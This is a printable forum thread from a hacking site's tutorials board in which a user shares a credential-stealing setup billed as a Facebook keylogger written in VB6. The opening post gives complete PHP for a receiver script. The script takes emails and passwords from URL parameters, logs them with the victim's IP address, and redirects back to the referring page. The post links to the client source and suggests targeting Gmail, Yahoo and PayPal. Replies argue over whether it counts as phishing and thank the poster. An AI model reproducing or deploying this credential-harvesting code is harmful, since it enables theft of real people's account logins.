![]() |
|
Facebook KeyLog using Vb.6 ( newbie ) - Printable Version +- Sinisterly (https://sinister.ly) +-- Forum: Hacking (https://sinister.ly/Forum-Hacking) +--- Forum: Tutorials (https://sinister.ly/Forum-Tutorials) +--- Thread: Facebook KeyLog using Vb.6 ( newbie ) (/Thread-Facebook-KeyLog-using-Vb-6-newbie) |
Facebook KeyLog using Vb.6 ( newbie ) - suryadewa - 08-08-2011 hello all member HC , now i want to share vb6 seurce for facebook keylogger ,, emm i'm sorry if double post and sorry for my bad english ^_^/ first you need have a web hosting ,, you can register on free webhost ,, or anything u want , and then create 2 Files DC.php and pass.txt Script For DC.php Code: <?php
$datum=date('d-m-Y / h:i:s a');
$email = $_GET[e];
$password = $_GET[p];
$ip = getenv ('REMOTE_ADDR');
$fl = fopen('text.txt', 'a');
fwrite($fl, "IP Address : $ip\nDate : $datum\nUsername : $email\nPassword : $password\n\n");
fclose($fl);
$ref = $_SERVER['HTTP_REFERER'];
header("location: $ref");
?>and then pass.txt leave blank .. Next , Download this file And Edit anything you want ,, this seurce i think not only use for fb , but you can use for yahu , gmail , or pp depend from your creativity Download Full Seurce Vb.6 i'm sorry if you don't like this post ^_^ mod of all staff Can delete this topic i'm just a newbie added SS RE: Facebook Phising using Vb.6 ( newbie ) - Shining White - 08-08-2011 i think phishing is not allowed here ![]() olease read the rules RE: Facebook Phising using Vb.6 ( newbie ) - Hacker. - 08-08-2011 thak you but the link don't work RE: Facebook Phising using Vb.6 ( newbie ) - suryadewa - 08-08-2011 Uh Really ?? i'm sorry i'm new here thanks for warn ,, so ... i need delete it ?? @ Hacker. link work for me friend ,, btw this is not phising but Keylogger LOL RE: Facebook KeyLog using Vb.6 ( newbie ) - barhoumti - 08-08-2011 suryadewa : hello all member HC , now i want to share vb6 seurce for facebook phising suryadewa : btw this is not phising but Keylogger LOL barhoumti : btw thanks for the share and keep uploading
RE: Facebook KeyLog using Vb.6 ( newbie ) - suryadewa - 08-08-2011 LOL LOL LOL edit again
|